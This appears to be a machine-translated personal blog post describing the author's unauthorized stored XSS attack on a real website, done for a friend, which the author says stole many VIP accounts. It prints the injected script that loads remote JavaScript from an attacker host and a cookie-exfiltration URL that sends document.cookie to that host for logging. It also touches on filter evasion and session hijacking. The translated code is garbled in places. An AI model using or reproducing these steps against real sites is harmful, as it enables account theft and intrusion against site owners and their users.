The first successful XSS attack, stealing a large number of VIP accounts from the target website

Preface

I used to do this before.CodeXSS (Cross Site Script) attack defense, but it is only in the stage of understanding, do not know the specific principle, let alone use. Recently, a friend asked me to help him hack a website for some purpose. Finally, I thought about a solution and finally implemented it successfully. In retrospect, XSS is the main solution.

(This article will not publish the target website address. The main purpose is to exchange technologies to help you better defend against XSS in Web development.

ViewArticleThe title is a good one. In fact, I will not modify their passwords. It is too bad for me to do anything, haha. :))

 

XSS Overview

For more information about XSS, refer to Baidu Baike: http://baike.baidu.com/view/50325.htm.

 

Attack Process

Suppose I want to steal other users from www.target.com and use their identities to log on to the site. Then I also need a server of my own, for example, www.hackhost.com. Then, log on to target.com using my own account, and submit the script on my personal page (for example, add a script to my personal file. For details about how to submit the API, I will discuss it later .). The script content is relatively simple, as follows:

VaR cb = Document. createelement ("script"); Cb. src = "www.hackhost.com/clienthacker.js? "+ New date (). gettime (); document. Body. appendchild (CB );

In this way, every other user who browses my personal page will automatically download the Javascript file www.hackhost.com/clienthacker.js for execution. This file is deployed on my hackhost.com server. I can add any script to it. In this way, the entire client of the currently logged-on user is under the control of this script.

Next, you can get the user's cookie through document. Cookie and then submit it to hackhost.com. Because cross-origin is already used, Ajax cannot be used for submission. Just like downloading a file, you can splice a link to download a new file. For example, download 'www .hackhost.com/cookiegetter.ashx? C = '+ document. Cookie.

After receiving this request, the server can record the cookie, IP address, and time. This makes it easy for me to analyze every request.

 

Required tools

There are not many tools involved in this hack, mainly using Fiddler to analyze and forge various HTTP requests.

In addition, some class libraries used for flash sales will be reused (see "flash sales" Tips), mainly used to submit constructed HTTP requests using code in. Net environments.

 

Result

A lot of VIP accounts.

 

Difficulties

In fact, the XSS difficulty lies in how to inject scripts into the target website. This requires analyzing the input filtering rules of the target website, and then constructing JS that does not meet the filtering rules and can be executed eventually. This article is not bad: "A complete XSS wrom implementation process".

In other places, JavaScript cannot obtain the complete cookie value. This is because JS cannot be read if the cookie contains the HTTPOnly flag. For example, the client cookie corresponding to the sessionid of the Asp.net website is marked with HTTPOnly. Otherwise, we can obtain the most recently available session through JS and forge the session for session hijacking ).

 

 

Summary

In general, this attack is relatively simple. In addition, the target website did not do much work for its own security, so it was easy for me to inject Js. In addition, they also save the user identity in the cookie. Although the identity is encrypted, this does not affect my use cases.

I have done flash sales before, but it is not a hack. This is the first success of the hack.

 

 

(In January, at least one summary was submitted at the last minute of this month. It was almost broken .)